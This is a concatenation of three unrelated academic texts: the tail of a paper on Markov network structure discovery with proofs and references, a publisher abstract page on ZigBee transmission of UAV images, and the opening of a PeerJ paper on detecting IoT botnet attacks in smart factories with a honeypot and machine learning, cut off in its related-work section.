0.657 0.657 0.704 11 bridges 12 70 520 455 141 0.814 0.635 0.916 12 car 7 1728 194 140 67 0.622 0.677 0.761 13 monks-1 7 556 135 93 42 0.936 0.936 0.936 14 haberman 5 306 98 76 42 0.308 0.308 0.308 15 nursery 9 12960 411 270 123 0.444 0.793 0.755 16 crx 16 653 1719 999 305 0.279 0.556 0.892 17 imports-85 25 193 4519 3064 1102 0.329 0.460 0.847 18 dermatology 35 358 9902 6687 2635 0.348 0.541 0.808 19 adult 10 32561 870 652 418 0.526 0.537 0.551 Because for real-world data the structure of the underlying Bayesian network (if any) is unknown, it is impossible to measure the Hamming distance of the resulting network structure. Instead, we measured the estimated accuracy of a network produced by GSMN∗ or GSIMN by comparing the result (true or false) of a number of conditional independence tests on the network learned by them (using vertex separation) to the result of the same tests performed on the data set (using a χ2 test). This approach is similar to estimating accuracy in a classification task over unseen instances but with inputs here being triplets (X, Y, Z) and the class attribute being the value of the corresponding conditional independence test. We used 1/3 of the real-world data set (randomly sampled) as input to GSMN∗ and GSIMN and the entire data set to the χ2 test. This corresponds to the hypothetical scenario that a much smaller data set is available to the researcher, and approximates the true value of the test by its outcome on the entire data set. Since the number of possible tests is exponential, we estimated the independence accuracy by sampling 10,000 triplets (X, Y, Z) randomly, evenly distributed among all possible conditioning set sizes m ∈ {0, . . . , n − 2} (i.e., 10000/(n − 1) tests for each m). Each of these triplets was constructed as follows: First, two variables X and Y were drawn randomly from V. Second, the conditioning set was determined by picking the first m variables from a random permutation of V−{X, Y }. Denoting by T this set of 10,000 triplets, by t ∈T a triplet, by Idata(t) the result of a test performed on the entire data set and by Inetwork(t) the result of a test performed on the 476 Efficient Markov Network Structure Discovery Using Independence Tests network output by either GSMN∗ or GSIMN, the estimated accuracy is defined as: ̂accuracy = 1 |T | ∣ ∣ ∣ ∣ { t ∈T | Inetwork(t) = Idata(t) } ∣ ∣ ∣ ∣ . For each of the data sets, Table 1 shows the detailed results for accuracy and the weighted number of tests for the GSMN∗ and GSIMN algorithms. These results are also plotted in Figure 14, with the horizontal axis indicating the data set index appearing in the first column of Table 1. Figure 14 plots two quantities in the same graph for these real-world data sets: the ratio of the weighted number of tests of GSIMN versus the two GSMN∗ algorithms and the difference of their accuracies. For each data set, an improvement of GSIMN over GSMN∗ corresponds to a number smaller than 1 for the ratios and a positive histogram bar for the accuracy differences. We can observe that GSIMN reduced the weighted number of tests on every data set, with maximum savings of 82% over GSMN∗ without propagation (for the “crx” data set) and 60% over GSMN∗ with propagation (for the “crx” data set as well). Moreover, in 11 out of 19 data sets GSIMN resulted in improved accuracy, 6 in a tie and only 2 in somewhat reduced accuracy compared to GSMN∗ with propagation (for the “nursery” and “balance-scale” data sets). 6. Conclusions and Future Research In this paper we presented two algorithms, GSMN∗ and GSIMN, for learning efficiently the structure of a Markov network of a domain from data using the independence-based approach (as opposed to NP-hard algorithms based on maximum likelihood estimation) We evaluated their performance through measurement of the weighted number of tests they require to learn the structure of the network and the quality of the networks learned from both artificial and real-world data sets. GSIMN showed a decrease in the vast majority of artificial and real-world domains in an output network quality comparable to that of GSMN∗, with some cases showing improvement. In addition, GSIMN was shown to be nearly optimal in the number of tests executed compared to GSIMN-FCH, which uses an exhaustive search to produce all independence information that can inferred from Pearl’s axioms. Some directions of future research include an investigation into the way the topology of the underlying Markov network affects the number of tests required and quality of the resulting network, especially for commonly occurring topologies such as grids. Another research topic is the impact on number of tests of other examination and grow orderings of the variables. Acknowledgments We thank Adrian Silvescu for insightful comments on accuracy measures and general advice on the theory of undirected graphical models. Appendix A. Correctness of GSMN∗ For each variable X ∈ V examined during the main loop of the GSMN∗ algorithm (lines 10–39), the set BX of variable X ∈ V is constructed by growing and shrinking a set S, 477 Bromberg, Margaritis, & Honavar starting from the empty set. X is then connected to each member of BX to produce the structure of a Markov network. We prove that this procedure returns the actual Markov network structure of the domain. For the proof of correctness we make the following assumptions. • The axioms of Eqs. (1) hold. • The probability distribution of the domain is strictly positive (required for Intersection axiom to hold). • Tests are conducted by querying an oracle, which returns its true value in the under- lying model. The algorithm examines every variable Y ∈ λX for inclusion to S (and thus to BX ) during the grow phase (lines 18 to 33) and, if Y was added to S during the grow phase, it considers it for removal during the shrinking phase (lines 34 to 37). Note that there is only one test executed between X and Y during the growing phase of X; we call this the grow test of Y on X (line 23). Similarly, there is one or no tests executed between X and Y during the shrinking phase; this test (if executed) is called the shrink test of Y on X (line 36). The general idea behind the proof is to show that, while learning the blanket of X, variable Y is in S by the end of the shrinking phase if and only if the dependence (X 6⊥⊥Y | V −{X, Y }) between X and Y holds (which, according to Theorem 2 at the end of the Appendix, implies there is an edge between X and Y ). We can immediately prove one direction. Lemma 1. If Y /∈ S at the end of the shrink phase, then (X⊥⊥Y | V −{X, Y }). Proof. Let us assume that Y /∈ S by the end of the shrink phase. Then, either Y was not added to set S during the grow phase (i.e., line 24 was never reached), or removed from it during the shrink phase (i.e., line 37 was reached). The former can only be true if (pXY > α) in line 22 (indicating X and Y are unconditionally independent) or Y was found independent of X in line 23. The latter can only be true if Y was found independent of X in line 36. In all cases then ∃A ⊆ V−{X, Y } such that (X⊥⊥Y | A), and by Strong Union then (X⊥⊥Y | V −{X, Y }). The opposite direction is proved in Lemma 6 below. However, its proof is more involved, requiring a few auxiliary lemmas, observations, and definitions. The two main auxiliary Lemmas are 4 and 5. Both use the lemma presented next (Lemma 2) inductively to extend the conditioning set of dependencies found by the grow and shrink tests between X and Y , to all the remaining variables V−{X, Y }. The Lemma shows that, if a certain independence holds, the conditioning set of a dependence can be increased by one variable. Lemma 2. Let X, Y ∈ V, Z ⊆ V −{X, Y }, and Z′ ⊆ Z. Then ∀W ∈ V, (X 6⊥⊥Y | Z) and (X⊥⊥W | Z′ ∪{Y }) =⇒ (X 6⊥⊥Y | Z ∪{W}). 478 Efficient Markov Network Structure Discovery Using Independence Tests Proof. We prove by contradiction, and make use of the axioms of Intersection (I), Strong Union (SU), and Decomposition (D). Let us assume that (X 6⊥⊥Y | Z) and (X⊥⊥W | Z′∪{Y }) but (X⊥⊥Y | Z ∪{W}). Then (X⊥⊥Y | Z ∪{W}) and (X⊥⊥W | Z′ ∪{Y }) SU =⇒ (X⊥⊥Y | Z ∪{W}) and (X⊥⊥W | Z ∪{Y }) I =⇒ (X⊥⊥{Y, W} | Z) D =⇒ (X⊥⊥Y | Z) ∧ (X⊥⊥W | Z) =⇒ (X⊥⊥Y | Z). This contradicts the assumption (X 6⊥⊥Y | Z). We now introduce notation and definitions and prove auxiliary lemmas. We denote by SG the value of S at the end of the grow phase (line 34) i.e., the set of variables found dependent of X during the grow phase, and by SS the value of S at the end of the shrink phase (line 39). We also denote by G the set of variables found independent of X during the grow phase and by U = [U0, . . . , Uk] the sequence of variables shrunk from BX , i.e., found independent of X during the shrink phase. The sequence U is assumed ordered as follows: if i < j then variable Ui was found independent from X before Uj during the shrinking phase. A prefix of the first i variables [U0, . . . , Ui−1] of U is denoted by Ui. For some test t performed during the algorithm, we define k(t) as the integer such that Uk(t) is the prefix of U containing the variables that were found independent of X in this loop before t. Furthermore, we abbreviate Uk(t) by Ut. From the definition of U and the fact that in the grow phase the conditioning set increases by dependent variables only, we can immediately make the following observation: Observation 1. For some variable Ui ∈ U, if t denotes the shrink test performed between X and Ui then Ut = Ui−1. We can then relate the conditioning set of the shrink test t with Ut as follows: Lemma 3. If Y ∈ SS and t = (X, Y | Z) is the shrink test of Y , then Z = SG −Ut −{Y }. Proof. According to line 36 of the algorithm, Z = S−{Y }. At the beginning of the shrink phase (line 34) S = SG, but variables found independent afterward and until t is conducted are removed from S in line 37. Thus, by the time t is performed, S = SG − Ut and the conditioning set becomes SG − Ut −{Y }. Corollary 1. (X⊥⊥Ui | SG − Ui). Proof. The proof follows immediately from Lemma 3, Observation 1, and the fact that Ui = Ui−1 ∪{Ui}. The following two lemmas use Lemma 2 inductively to extend the conditioning set of the dependence between X and a variable Y in SS . The first lemma starts from the shrink test between X and Y (a dependence), and extends its conditioning set from SS −{Y } (or equivalently SG −{Y }− Ut according to Lemma 3) to SG −{Y }. 479 Bromberg, Margaritis, & Honavar Lemma 4. If Y ∈ SS and t is the shrink test of Y , then (X 6⊥⊥Y | SG −{Y }). Proof. The proof proceeds by proving (X 6⊥⊥Y | SG −{Y }− Ui) by induction on decreasing values of i, for i ∈ {0, 1, . . . , k(t)}, starting at i = k(t). The lemma then follows for i = 0 by noticing that U0 = ∅. • Base case (i = k(t)): From Lemma 3, t = (X, Y | SG −{Y }− Ut), which equals (X, Y | SG −{Y }−Uk(t)) by definition of Ut. Since Y ∈ SS , it must be the case that t was found dependent, i.e., (X 6⊥⊥Y | SG −{Y }− Uk(t)). • Inductive step: Let us assume that the statement is true for i = m, 0 < m ≤ k(t)−1: (X 6⊥⊥Y | SG −{Y }− Um). (2) We need to prove that this is also true for i = m − 1: (X 6⊥⊥Y | SG −{Y }− Um−1). By Corollary 1, we have (X⊥⊥Um | SG − Um) and by Strong Union, (X⊥⊥Um | (SG − Um) ∪{Y }) or (X⊥⊥Um | (SG − Um −{Y }) ∪{Y }). (3) From Eqs. (2), (3) and Lemma 2 we get the desired relation: (X 6⊥⊥Y | (SG −{Y }− Um) ∪{Um}) = (X 6⊥⊥Y | SG −{Y }− Um−1). Observation 2. By definition of SG, we have that for every test t = (X, Y | Z) performed during the grow phase, Z ⊆ SG. The following lemma completes the extension of the conditioning set of the dependence between X and Y ∈ SS into the universe of variables V −{X, Y }, starting from SG −{Y } (where Lemma 4 left off) and extending it to SG ∪ G −{Y }. Lemma 5. If Y ∈ SS, then (X 6⊥⊥Y | SG ∪ G −{Y }). Proof. The proof proceeds by proving (X 6⊥⊥Y | SG ∪ Gi −{Y }) by induction on increasing values of i from 0 to |G|, where Gi denotes the first i elements of an arbitrary ordering of set G. 480 Efficient Markov Network Structure Discovery Using Independence Tests • Base Case (i = 0): Follows directly from Lemma 4 for i = 0, since G0 = ∅. • Inductive Step: Let us assume that the statement is true for i = m, 0 ≤ m < |G|: (X 6⊥⊥Y | SG ∪ Gm −{Y }). (4) We need to prove that it is also true for i = m + 1: (X 6⊥⊥Y | SG ∪ Gm+1 −{Y }). (5) From Observation 2 the grow test of Gm results in the independence: (X⊥⊥Gm | Z), where Z ⊆ SG. By the Strong Union axiom this can become: (X⊥⊥Gm | Z ∪{Y }), where Z ⊆ SG (6) or equivalently (X⊥⊥Gm | (Z −{Y }) ∪{Y }), where Z ⊆ SG. (7) Since Z ⊆ SG ⊆ SG ∪ Gm, we have that Z −{Y } ⊆ SG ∪ Gm, and so from Eq. (4) and Lemma 2 we get the desired relation: (X 6⊥⊥Y | (SG ∪ Gm −{Y }) ∪ Gm) = (X 6⊥⊥Y | SG ∪ Gm+1 −{Y }). Finally, we can prove that X is dependent with every variable Y ∈ SS given the universe V −{X, Y }. Lemma 6. If Y ∈ SS, then (X 6⊥⊥Y | V −{X, Y }). Proof. From Lemma 5, (X 6⊥⊥Y | SG ∪ G −{Y }) It suffices then to prove that SG ∪ G −{Y } = V −{X, Y }. In loop 6–9 of GSMN ∗, the queue λX is populated with all elements in V −{X}, and then, in line 21, Y is removed from λX . The grow phase then partitions λX into variables dependent of X (set SG) and independent of X (set G). Corollary 2. Y ∈ SS ⇐⇒ (X 6⊥⊥Y | V −{X, Y }). Proof. Follows directly from Lemmas 1 and 6. From the above Corollary we can now immediately show that the graph returned by connecting X to each member of BX = SS is exactly the Markov network of the domain using the following theorem, first published by Pearl and Paz (1985). Theorem 2. (Pearl & Paz, 1985) Every dependence model M satisfying symmetry, decom- position, and intersection (Eqs. (1)) has a unique Markov network G = (V, E) produced by deleting from the complete graph every edge (X, Y ) for which (X⊥⊥Y | V −{X, Y }) holds in M , i.e., (X, Y ) /∈ E ⇐⇒ (X⊥⊥Y | V −{X, Y }) in M . 481 Bromberg, Margaritis, & Honavar Appendix B. Correctness of GSIMN The GSIMN algorithm differs from GSMN∗ only by the use of test subroutine IGSIMN instead of IGSMN∗ (Algorithms 5 and 4, respectively), which in turn differs by a number of additional inferences conducted to obtain the independencies (lines 8 to 22). These inferences are direct applications of the Strong Union axiom (which holds by assumption) and the Triangle theorem (which was proven to hold in Theorem 1). Using the correctness of GSMN∗ (proven in Appendix A) we can therefore conclude that the GSIMN algorithm is correct. References Abbeel, P., Koller, D., & Ng, A. Y. (2006). Learning factor graphs in polynomial time and sample complexity. Journal of Machine Learning Research, 7, 1743–1788. Acid, S., & de Campos, L. M. (2003). Searching for Bayesian network structures in the space of restricted acyclic partially directed graphs. Journal of Artificial Intelligence Research, 18, 445–490. Agresti, A. (2002). Categorical Data Analysis (2nd edition). Wiley. Aliferis, C. F., Tsamardinos, I., & Statnikov, A. (2003). HITON, a novel Markov blanket algorithm for optimal variable selection. In Proceedings of the American Medical Informatics Association (AMIA) Fall Symposium. Anguelov, D., Taskar, B., Chatalbashev, V., Koller, D., Gupta, D., Heitz, G., & Ng, A. (2005). Discriminative learning of Markov random fields for segmentation of 3D range data. In Proceedings of the Conference on Computer Vision and Pattern Recognition (CVPR). Barahona, F. (1982). On the computational complexity of Ising spin glass models. Journal of Physics A: Mathematical and General, 15 (10), 3241–3253. Besag, J. (1974). Spacial interaction and the statistical analysis of lattice systems. Journal of the Royal Statistical Society, Series B, 36, 192–236. Besag, J., York, J., & Mollie, A. (1991). Bayesian image restoration with two applications in spatial statistics.. Annals of the Institute of Statistical Mathematics, 43, 1–59. Bromberg, F., Margaritis, D., & Honavar, V. (2006). Efficient Markov network structure dis- covery from independence tests. In Proceedings of the SIAM International Conference on Data Mining. Buntine, W. L. (1994). Operations for learning with graphical models. Journal of Artificial Intelligence Research, 2, 159–225. Castelo, R., & Roverato, A. (2006). A robust procedure for Gaussian graphical model search from microarray data with p larger than n. Journal of Machine Learning Research, 7, 2621–2650. Chow, C., & Liu, C. (1968). Approximating discrete probability distributions with depen- dence trees. IEEE Transactions on Information Theory, 14 (3), 462 – 467. 482 Efficient Markov Network Structure Discovery Using Independence Tests Cochran, W. G. (1954). Some methods of strengthening the common χ2 tests. Biometrics, 10, 417–451. Della Pietra, S., Della Pietra, V., & Lafferty, J. (1997). Inducing features of random fields. IEEE Transactions on Pattern Analysis and Machine Intelligence, 19 (4), 390–393. Dobra, A., Hans, C., Jones, B., Nevins, J. R., Yao, G., & West, M. (2004). Sparse graphical models for exploring gene expression data. Journal of Multivariate Analysis, 90, 196– 212. Edwards, D. (2000). Introduction to Graphical Modelling (2nd edition). Springer, New York. Friedman, N., Linial, M., Nachman, I., & Pe’er, D. (2000). Using Bayesian networks to analyze expression data. Computational Biology, 7, 601–620. Geman, S., & Geman, D. (1984). Stochastic relaxation, gibbs distributions, and the bayesian relation of images.. IEEE Transactions on Pattern Analysis and Machine Intelligence, 6, 721–741. Heckerman, D. (1995). A tutorial on learning bayesian networks. Tech. rep. MSR-TR-95-06, Microsoft Research. Heckerman, D., Geiger, D., & Chickering, D. M. (1995). Learning Bayesian networks: The combination of knowledge and statistical data. Machine Learning, 20, 197–243. Henrion, M. (1988). Propagation of uncertainty by probabilistic logic sampling in Bayes’ networks. In Lemmer, J. F., & Kanal, L. N. (Eds.), Uncertainty in Artificial Intelli- gence 2. Elsevier Science Publishers B.V. (North Holland). Hofmann, R., & Tresp, V. (1998). Nonlinear Markov networks for continuous variables. In Neural Information Processing Systems, Vol. 10, pp. 521–529. Isard, M. (2003). Pampas: Real-valued graphical models for computer vision. In IEEE Conference on Computer Vision and Pattern Recognition, Vol. 1, pp. 613–620. Jerrum, M., & Sinclair, A. (1993). Polynomial-time approximation algorithms for the Ising model. SIAM Journal on Computing, 22, 1087–1116. Kearns, M. J., & Vazirani, U. V. (1994). An Introduction to Computational Learning Theory. MIT Press, Cambridge, MA. Koller, D., & Sahami, M. (1996). Toward optimal feature selection. In International Con- ference on Machine Learning, pp. 284–292. Lam, W., & Bacchus, F. (1994). Learning Bayesian belief networks: an approach based on the MDL principle. Computational Intelligence, 10, 269–293. Lauritzen, S. L. (1996). Graphical Models. Oxford University Press. Margaritis, D., & Thrun, S. (2000). Bayesian network induction via local neighborhoods. In Solla, S., Leen, T., & Müller, K.-R. (Eds.), Advances in Neural Information Processing Systems 12, pp. 505–511. MIT Press. McCallum, A. (2003). Efficiently inducing features of conditional random fields. In Pro- ceedings of Uncertainty in Artificial Intelligence (UAI). 483 Bromberg, Margaritis, & Honavar Newman, D. J., Hettich, S., Blake, C. L., & Merz, C. J. (1998). UCI repository of machine learning databases. Tech. rep., University of California, Irvine, Dept. of Information and Computer Sciences. Peña, J. M. (2008). Learning Gaussian graphical models of gene networks with false dis- covery rate control. In Proceedings of the 6th European Conference on Evolutionary Computation, Machine Learning and Data Mining in Bioinformatics, pp. 165–176. Pearl, J. (1988). Probabilistic Reasoning in Intelligent Systems: Networks of Plausible In- ference. Morgan Kaufmann Publishers, Inc. Pearl, J., & Paz, A. (1985). Graphoids: A graph-based logic for reasoning about releveance relations. Tech. rep. 850038 (R-53-L), Cognitive Systems Laboratory, University of California. Rebane, G., & Pearl, J. (1989). The recovery of causal poly-trees from statistical data. In Kanal, L. N., Levitt, T. S., & Lemmer, J. F. (Eds.), Uncertainty in Artificial Intelligence 3, pp. 175–182, Amsterdam. North-Holland. Schäfer, J., & Strimmer, K. (2005). An empirical bayes approach to inferring large-scale gene association networks. Bioinformatics, 21, 754–764. Scott, D. W. (1992). Multivariate Density Estimation. Wiley series in probability and mathematical statistics. John Wiley & Sons. Shekhar, S., Zhang, P., Huang, Y., & Vatsavai, R. R. (2004) In Kargupta, H., Joshi, A., Sivakumar, K., & Yesha, Y. (Eds.), Trends in Spatial Data Mining, chap. 19, pp. 357–379. AAAI Press / The MIT Press. Spirtes, P., Glymour, C., & Scheines, R. (2000). Causation, Prediction, and Search (2nd edition). Adaptive Computation and Machine Learning Series. MIT Press. Srebro, N., & Karger, D. (2001). Learning Markov networks: Maximum bounded tree-width graphs. In ACM-SIAM Symposium on Discrete Algorithms. Tsamardinos, I., Aliferis, C. F., & Statnikov, A. (2003a). Algorithms for large scale Markov blanket discovery. In Proceedings of the 16th International FLAIRS Conference, pp. 376–381. Tsamardinos, I., Aliferis, C. F., & Statnikov, A. (2003b). Time and sample efficient discov- ery of Markov blankets and direct causal relations. In Proceedings of the 9th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, pp. 673–678. Tsamardinos, I., Brown, L. E., & Aliferis, C. F. (2006). The max-min hill-climbing Bayesian network structure learning algorithm. Machine Learning, 65, 31–78. Whittaker, J. (1990). Graphical Models in Applied Multivariate Statistics. John Wiley & Sons, New York. 484 work_dlderla2pvcoffpl2iq6a6dw6i ---- Research and Implementation of the Key Technology of UAV Aerial Image Transmission | Atlantis Press Proceedings Journals Books Series:Advances in Computer Science Research Proceedings of the 2018 Second International Conference of Sensor Network and Computer Engineering (ICSNCE 2018) home preface articles authors sessions organizers publishing information <Previous Article In Volume Next Article In Volume> Research and Implementation of the Key Technology of UAV Aerial Image Transmission Authors Fan Yijun, Lai Yufeng Corresponding Author Fan Yijun Available Online April 2018. DOI https://doi.org/10.2991/icsnce-18.2018.45How to use a DOI? Keywords ZigBee; UAV; Mapping; Image; Transmission Abstract With the maturity of UAV technology, especially the cost of the four rotor unmanned aerial vehicle is decreasing, the unmanned aerial vehicle (UAV) will be a trend in the future. At the same time, because ZigBee has the characteristics of low cost, low speed and short transmission distance, we use ZigBee to achieve the transmission of image files between UAV and ground receiving system computers. This paper introduces the system design and software program module hardware node design, the first use of ZigBee wireless network as a data link, and then collected by the UAV to the ground of the computer image transmission, in the process of transmission by subcontracting, merging, stop and wait Agreement to ensure the correctness of data transmission right. Through experimental test, the correct transmission of image files between UAV and ground end computer can be realized when the image data is less than 1024K bytes. Open Access This is an open access article distributed under the CC BY-NC license. Download article (PDF) <Previous Article In Volume Next Article In Volume> Proceedings 2018 Second International Conference of Sensor Network and Computer Engineering (ICSNCE 2018) Part of series Advances in Computer Science Research Publication Date April 2018 ISBN 978-94-6252-498-9 ISSN 2352-538X DOI https://doi.org/10.2991/icsnce-18.2018.45How to use a DOI? Open Access This is an open access article distributed under the CC BY-NC license. Cite this article risenwbib TY - CONF AU - Fan Yijun AU - Lai Yufeng PY - 2018/04 DA - 2018/04 TI - Research and Implementation of the Key Technology of UAV Aerial Image Transmission BT - 2018 Second International Conference of Sensor Network and Computer Engineering (ICSNCE 2018) PB - Atlantis Press SP - 224 EP - 228 SN - 2352-538X UR - https://doi.org/10.2991/icsnce-18.2018.45 DO - https://doi.org/10.2991/icsnce-18.2018.45 ID - Yijun2018/04 ER - download .riscopy to clipboard Atlantis Press Atlantis Press is a professional publisher of scientific, technical and medical (STM) proceedings, journals and books. We offer world-class services, fast turnaround times and personalised communication. The proceedings and journals on our platform are Open Access and generate millions of downloads every month. For more information, please contact us at: contact@atlantis-press.com ProceedingsJournalsBooksPublishing services AboutNewsContactSearch Copyright © 2006-2021 Atlantis Press HomePrivacy PolicyTerms of use work_dmcovzu62jccrgxrk62safxfcu ---- Classification of botnet attacks in IoT smart factory using honeypot combined with machine learning Classification of botnet attacks in IoT smart factory using honeypot combined with machine learning Seungjin Lee, Azween Abdullah, Nz Jhanjhi and Sh Kok School of Computer Science & Engineering, Taylor’s University, Subang Jaya, Selangor, Malaysia ABSTRACT The Industrial Revolution 4.0 began with the breakthrough technological advances in 5G, and artificial intelligence has innovatively transformed the manufacturing industry from digitalization and automation to the new era of smart factories. A smart factory can do not only more than just produce products in a digital and automatic system, but also is able to optimize the production on its own by integrating production with process management, service distribution, and customized product requirement. A big challenge to the smart factory is to ensure that its network security can counteract with any cyber attacks such as botnet and Distributed Denial of Service, They are recognized to cause serious interruption in production, and consequently economic losses for company producers. Among many security solutions, botnet detection using honeypot has shown to be effective in some investigation studies. It is a method of detecting botnet attackers by intentionally creating a resource within the network with the purpose of closely monitoring and acquiring botnet attacking behaviors. For the first time, a proposed model of botnet detection was experimented by combing honeypot with machine learning to classify botnet attacks. A mimicking smart factory environment was created on IoT device hardware configuration. Experimental results showed that the model performance gave a high accuracy of above 96%, with very fast time taken of just 0.1 ms and false positive rate at 0.24127 using random forest algorithm with Weka machine learning program. Hence, the honeypot combined machine learning model in this study was proved to be highly feasible to apply in the security network of smart factory to detect botnet attacks. Subjects Computer Networks and Communications, Data Mining and Machine Learning, Real-Time and Embedded Systems, Scientific Computing and Simulation, Security and Privacy Keywords Smart factory, Machine learning, Honeypot, Botnets detection, IoT INTRODUCTION The Industrial Revolution 4.0 has brought a great innovation to the conventional manufacturing into the new era of smart factories (Oztemel & Gursev, 2020). The conventional factories involve automation or digitalization within each production process. This, however, make it very difficult to manage the entire production chain from general to specific levels. More innovatively, smart factory can effectively manage many processes in the production chain thanks to the use of many Internet of Things (IoT) devices. They are installed and interconnected with each other in every machine or equipment along the production chain. Hence, a smart factory is advantageous in How to cite this article Lee S, Abdullah A, Jhanjhi N, Kok S. 2021. Classification of botnet attacks in IoT smart factory using honeypot combined with machine learning. PeerJ Comput. Sci. 7:e350 DOI 10.7717/peerj-cs.350 Submitted 29 October 2020 Accepted 7 December 2020 Published 25 January 2021 Corresponding author Seungjin Lee, leephael8707@gmail.com Academic editor Muhammad Tariq Additional Information and Declarations can be found on page 21 DOI 10.7717/peerj-cs.350 Copyright 2021 Lee et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.350 mailto:leephael8707@�gmail.�com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.350 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ producing a variety of products according to customer's desire at better quality and higher productivity. Also, IoT devices/equipment play a very important role in the operation and management of smart factories. A demand for the IoT equipment in smart factories has been increasing since 2012 as shown in Fig. 1. Especially in the last 5 years (2015–2020), the use of IoT devices has increased tremendously from 18.2 billion to 50 billion for application in the smart factories (Smith, 2015). Additionally, as smart factories are combined with Information and Communications Technology (ICT), all the facilities and devices are connected at the central wireless communication. This allows data to be freely linked between the processes and provides a more systematic, integrated and optimal production environment. Efficiency in time management for production can be greatly enhanced with a minimal production cost. Therefore, products produced by smart factories become more competitive in the market. Although IoT smart factories have been built and operated in the industry, standards of implementation for smart factories have yet to be established (Guo et al., 2020). Basically, a smart factory consists of three aspects, that is, interconnection, collaboration and execution, which all attribute to the manufacturing conceptualization of being adaptive and flexible (Jiafu et al., 2016). This concept is reflected in the architecture of the smart factory operating on IoT system as shown in Fig. 2 (Chen et al., 2017). With four layers arranged hierarchically, it starts at the physical resource layer, followed by the networking layer and the application layer, and ends at the terminal layer. A manufacturing system in the smart factory can be assessed from different layers (Li et al., 2018). With the aim of transforming conventional factories into smart factories, in-depth research needs to look into all layers. From the security perspective, research should focus more on the physical resource/ sensing layer, as it is directly related to the vast usage of the IoT devices in order to reinforce the security network for smart factories. Finding any security-related issues is one of the priorities required for a smooth system operation by means of resolving any Figure 1 Demand for IoT equipment. The use of IoT equipment that is increasing every year. Full-size DOI: 10.7717/peerj-cs.350/fig-1 Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 2/23 http://dx.doi.org/10.7717/peerj-cs.350/fig-1 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ failover problems arising from the entire manufacturing chain (Mittal et al., 2019). Especially, the IoT devices are such as radio-frequency identification (RFID), CCTVs, programmable logic controller (PLC) equipment, sensor and main database servers are installed or located at the physical resource layer. Data transmission between these IoT devices can be easily affected in case that data leakage in smart factory network occurs. In the worst case, data updates can be abused by unauthorized users (Ramos, Monge & Vidal, 2020). To mitigate the impact of data leakage and data abuse, real-time detection of cyber attacks to smart factory obviously becomes an extremely important factor to take into consideration of developing and improving security network of the smart factory (Brett et al., 2009). Network security in the smart factory is highly at risk of being under cyber attacks due to the interconnection of a huge number of IoT equipment. According to a recent report, instability is recognized as one of the biggest limitations out of 250 vulnerable features found in the IoT devices (Casalinuovo, 2019). As a result, cyber attack to smart factories can easily spread to not only quality process control and production control, but also product design which can be analyzed or copied by unauthorized or illegal accesses. In the worse scenario, highly confidential information such as process know-how, requirements Figure 2 Function requirements of smart factory. Features for each layer are shown. Full-size DOI: 10.7717/peerj-cs.350/fig-2 Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 3/23 http://dx.doi.org/10.7717/peerj-cs.350/fig-2 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ of data analysis, product design drawings, R&D results are shared outside of the smart factory. Such threats of information leakage can cause serious damages and economic losses to both manufacturing and business sectors. This kind of cyber attack can be done by the act of exploiting security vulnerabilities in the ICT system via remote control or surveillance of systems in the IoT smart factory. One of the most serious cyber attacks to smart factory is botnet. An example of the botnet attack is a temporary unavailability on some commercial websites such as Amazon, Netflix, Twitter, CNN and PayPal. A notable case ever recorded is the attack on the Dyn DNS infrastructure, which mobilized 100,000 IoT devices (mainly CCTV cameras) in October 2016. Another example is the new Mirai-source-code being launched in 2017. These Mirai-induced IoT botnets have occurred frequently in the recent years with a very serious consequence. Therefore, it is very important and urgent to identify and mitigate IoT botnets through the development of new technologies for network security (Ozcelik, Chalabianloo & Gur, 2017). As the number of attacks has soared due to unstable IoT devices in the Internet infrastructure, smart factories undoubtedly are highly possible to become an ideal victim of the IoT botnet attack. Among many detection methods, honeypot has been investigated to apply for detecting botnet attack in various studies in the recent years (Ja’fari et al., 2020). However, a huge volume of attacking data collected by honeypot is highly complex and non-classified. This causes to lower the efficiency of botnet detection by the honey method in term of time taken and accuracy. In order to improve the efficiency, it is crucial to focus on classifying botnet attacking information and obtaining botnet attacking behaviors (intrusion type in other words). In this particular area of dealing with big data, artificial intelligence or machine learning has recently been applied effectively to speed up data processing, and make prediction as well as detection (Seungjin, Abdullah & Jhanjhi, 2020). Hence, it becomes very potential to apply machine learning for botnet classification, which is notably yet to be investigated in previous studies, especially in the smart factory environment. Therefore, this study was aimed to investigate the feasibility of combining honeypot with machine learning in developing a botnet detection model for IoT smart factories. In this work, a configuration of hardware representing a physical layout of a smart factory was built and installed with software of honeypot combined machine learning. The whole setup was then programed to run for simulation to detect and classify botnet attacks into intrusion types. Problem statement The problem statement can be elaborated with following points: � A huge amount of attacking data collected by honeypot is highly complex. � Without data classification, efficiency of the honeypot model is low, since the current time taken is long but at low accuracy to detect botnet. � A very limited number of studies focused on botnet detection for the smart factory. � Strategy of using honeypot with machine learning has been suggested very recently with only study framework and lack of model verification for supporting. Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 4/23 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ Study approach � Apply machine learning as a supporting tool for classifying botnet attacks captured in log files generated by honeypot. Selection of random forest algorithm for machine learning to improve the classification process. Model testing on a hardware configuration mimicking a real smart factory environment. Related work Various botnet detection methods and their rationale are described in the Taxonomy in Fig. 3. Besides, a smart factory is layered into the perception (physical), communication, network, data and applications with the function of each, as shown in the following taxonomy of the same figure. Comparison of various detection models are presented in Table 1. Real-time detection is a very important factor which smart factories seek for Katz, Piantanida & Debbah (2017). � Honeypot can respond to attacks in real time and attract attackers to deceptive assets instead of actual assets (Duessel et al., 2017). Whereas for binary, anomaly detection methods, the response to real-time is however slower than that of the honeypot method (Gerstmayer et al., 2017; Fenzl et al., 2020). Figure 3 Taxonomies for botnet detection and security layers of IoT smart factories. The combi- nation of honeypot detection with the perception layer is shown. Full-size DOI: 10.7717/peerj-cs.350/fig-3 Lee et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.350 5/23 http://dx.doi.org/10.7717/peerj-cs.350/fig-3 http://dx.doi.org/10.7717/peerj-cs.350 https://peerj.com/computer-science/ � 